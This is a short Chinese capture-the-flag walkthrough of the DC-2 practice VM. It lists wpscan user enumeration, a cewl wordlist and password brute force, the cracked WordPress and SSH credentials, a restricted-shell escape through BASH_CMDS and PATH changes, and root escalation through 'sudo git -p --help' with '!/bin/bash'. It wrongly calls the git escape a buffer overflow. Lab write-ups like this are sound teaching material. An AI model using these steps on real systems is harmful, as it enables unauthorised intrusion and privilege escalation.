仅供个人娱乐
靶机信息
下载地址:http://www.five86.com/downloads/DC-2.zip
一、主机扫描
二、信息收集
修改hosts文件
windows:C:WindowsSystem32driversetc
linux:/etc/hosts
wpscan --url http://dc-2 --enumerate u
提示cewl 爬密码
cewl http://dc-2 > 1.txt
破解密码
wpscan --url http://dc-2 -U 2.txt -P 1.txt
登录账户信息收集
Username: jerry, Password: adipiscing
Username: tom, Password: parturient
尝试ssh登录 tom parturient 7744
查看当前环境
echo $PATH
有问题找百度
添加环境变量
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/ #添加$PATH,cat和su都在/bin下
export PATH=$PATH:/usr/bin #sudo在/usr/bin下
cat flag3.txt
Username: jerry, Password: adipiscing
切换账户进行信息收集
sudo -l 查看权限
有git权限,git有一个缓冲区溢出漏洞,在使用sudo git -p --help时,不需要输入root密码即可以root权限执行这条命令
在末行命令模式输入 !/bin/bash 或 !'sh' 完成提权
!/bin/bash
